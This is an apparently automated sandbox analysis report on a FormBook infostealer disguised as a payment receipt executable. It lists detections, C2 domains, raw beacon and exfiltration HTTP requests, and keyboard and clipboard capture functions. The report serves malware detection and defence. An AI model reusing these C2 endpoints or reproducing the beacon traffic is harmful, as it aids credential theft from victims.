Windows Analysis Report
payment_copy2_receipt.exe

AV Detection

Source: payment_copy2_receipt.exe	ReversingLabs: Detection: 53%
Source: payment_copy2_receipt.exe	Virustotal: Detection: 38%			Perma Link

Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v	Avira URL Cloud: Label: malware
Source: http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT	Avira URL Cloud: Label: malware
Source: http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs	Avira URL Cloud: Label: malware
Source: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV	Avira URL Cloud: Label: malware
Source: http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs	Avira URL Cloud: Label: malware
Source: http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM	Avira URL Cloud: Label: malware
Source: http://www.bem4u.shop/veh0/	Avira URL Cloud: Label: malware
Source: http://www.vnsuda.lol/veh0/	Avira URL Cloud: Label: malware
Source: http://www.coolfashionshop.xyz/veh0/	Avira URL Cloud: Label: malware
Source: www.projectlis.online/veh0/	Avira URL Cloud: Label: malware
Source: http://www.stephapproved.com/veh0/	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

ReversingLabs: Detection: 53%

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Joe Sandbox ML: detected

Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.projectlis.online/veh0/"]}

Compliance

Source: payment_copy2_receipt.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source:	Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		0_2_00405620
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00405FF6 FindFirstFileA,FindClose,		0_2_00405FF6
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00402654 FindFirstFileA,		0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00410290 FindFirstFileExW,		1_2_00410290

Networking

Source: C:\Windows\explorer.exe	Domain query: www.bem4u.shop
Source: C:\Windows\explorer.exe	Domain query: www.030332.com
Source: C:\Windows\explorer.exe	Domain query: www.vnsuda.lol
Source: C:\Windows\explorer.exe	Domain query: www.stephapproved.com
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 70.32.23.81 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.110.163.134 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.coolfashionshop.xyz
Source: C:\Windows\explorer.exe	Network Connect: 103.100.208.243 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.57.90.16 80			Jump to behavior

Source: C:\Windows\explorer.exe

DNS query: www.coolfashionshop.xyz

Source: Malware configuration extractor

URLs: www.projectlis.online/veh0/

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: A2HOSTINGUS A2HOSTINGUS

Source: global traffic	HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT HTTP/1.1Host: www.030332.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.vnsuda.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.stephapproved.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v HTTP/1.1Host: www.bem4u.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 75.2.115.196 75.2.115.196

Source: global traffic	HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.vnsuda.lolConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.vnsuda.lolUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vnsuda.lol/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.
Source: global traffic	HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.coolfashionshop.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coolfashionshop.xyz/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 77 31 6a 53 66 6c 50 65 73 73 61 7a 5a 66 69 68 42 6d 51 35 54 76 5a 57 33 71 4c 52 53 35 68 59 57 59 59 4f 4c 52 63 73 51 79 37 5f 6c 34 6b 79 5a 63 4f 6e 28 32 62 43 6f 4b 77 61 59 67 53 57 55 67 79 58 28 79 76 69 43 67 45 48 6f 36 47 43 47 58 5a 44 61 72 34 47 56 6f 59 72 66 49 47 58 4a 59 68 67 54 57 37 4d 68 7a 34 45 63 4f 55 69 68 6c 4d 57 65 79 71 32 76 38 30 53 45 61 57 56 4d 36 48 5f 32 65 79 48 44 63 54 37 6c 58 62 4c 51 62 47 63 56 4a 73 62 48 62 55 5f 6d 4a 7a 63 46 53 61 6e 71 4b 78 48 48 4f 4f 36 62 37 53 52 6a 72 6e 55 42 58 41 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=w1jSflPessazZfihBmQ5TvZW3qLRS5hYWYYOLRcsQy7_l4kyZcOn(2bCoKwaYgSWUgyX(yviCgEHo6GCGXZDar4GVoYrfIGXJYhgTW7Mhz4EcOUihlMWeyq2v80SEaWVM6H_2eyHDcT7lXbLQbGcVJsbHbU_mJzcFSanqKxHHOO6b7SRjrnUBXA.
Source: global traffic	HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.stephapproved.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.stephapproved.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.stephapproved.com/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 6e 30 71 45 73 54 75 6c 54 70 55 72 39 6e 32 7a 50 65 55 67 75 34 77 6a 64 76 46 61 4e 57 6a 6f 43 35 39 65 48 58 64 6f 34 78 47 61 67 36 4e 54 71 32 55 6a 63 70 33 4d 4c 64 4b 46 5a 69 6d 54 77 34 34 37 36 31 62 32 56 70 6c 30 49 77 73 51 66 64 54 56 42 6d 4f 7a 6b 4a 79 36 71 56 47 51 6a 6a 55 41 32 61 6a 35 67 37 39 47 70 35 6d 33 62 44 43 51 79 76 38 33 50 46 7a 54 45 64 79 46 77 48 61 71 37 4b 33 36 64 6c 4f 4f 52 32 79 6c 4d 4f 4e 51 76 30 36 6e 66 32 7e 69 35 77 28 75 7a 5a 37 72 76 65 7e 5a 31 62 63 4d 52 35 61 66 49 34 62 53 30 35 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=n0qEsTulTpUr9n2zPeUgu4wjdvFaNWjoC59eHXdo4xGag6NTq2Ujcp3MLdKFZimTw44761b2Vpl0IwsQfdTVBmOzkJy6qVGQjjUA2aj5g79Gp5m3bDCQyv83PFzTEdyFwHaq7K36dlOOR2ylMONQv06nf2~i5w(uzZ7rve~Z1bcMR5afI4bS05M.
Source: global traffic	HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.bem4u.shopConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.bem4u.shopUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bem4u.shop/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 31 42 57 76 56 6a 72 61 46 2d 73 54 64 48 28 39 47 73 38 53 58 7a 35 54 62 53 39 65 4e 45 79 4b 4e 46 48 6b 47 62 55 6b 52 59 50 49 6a 4f 33 72 37 33 74 73 66 42 65 62 6c 5f 75 66 67 32 44 5a 4f 38 50 69 69 6a 6b 36 44 36 68 73 4f 46 4d 63 6e 2d 4a 70 32 77 62 36 61 4b 48 58 49 71 37 37 55 6d 5a 41 78 37 6b 5a 28 65 44 52 75 2d 66 2d 4b 35 4a 53 44 30 49 56 47 66 30 38 67 4e 67 33 69 31 56 4c 45 50 42 61 6c 4d 48 63 30 66 74 6a 4c 33 49 79 69 38 77 41 6a 56 42 4f 52 6c 76 65 46 78 59 41 57 52 65 75 58 79 36 62 6d 64 56 4f 65 44 44 77 4a 79 77 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=1BWvVjraF-sTdH(9Gs8SXz5TbS9eNEyKNFHkGbUkRYPIjO3r73tsfBebl_ufg2DZO8Piijk6D6hsOFMcn-Jp2wb6aKHXIq77UmZAx7kZ(eDRu-f-K5JSD0IVGf08gNg3i1VLEPBalMHc0ftjL3Iyi8wAjVBORlveFxYAWReuXy6bmdVOeDDwJyw.

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:42:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 15:43:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 15:43:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:44:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:44:05 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: payment_copy2_receipt.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: payment_copy2_receipt.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: n5335GITL.12.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/fP
Source: n5335GITL.12.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: n5335GITL.12.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: n5335GITL.12.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: msdt.exe, 0000000C.00000002.514187588.000000000553A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.vnsuda.lolConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.vnsuda.lolUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vnsuda.lol/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.

Source: unknown

DNS traffic detected: queries for: www.030332.com

Source: global traffic	HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT HTTP/1.1Host: www.030332.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.vnsuda.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.stephapproved.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v HTTP/1.1Host: www.bem4u.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,

1_2_004050C0

Source: payment_copy2_receipt.exe, 00000000.00000002.259418578.00000000006DA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: 1_2_00404020 GetKeyboardState,

1_2_00404020

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

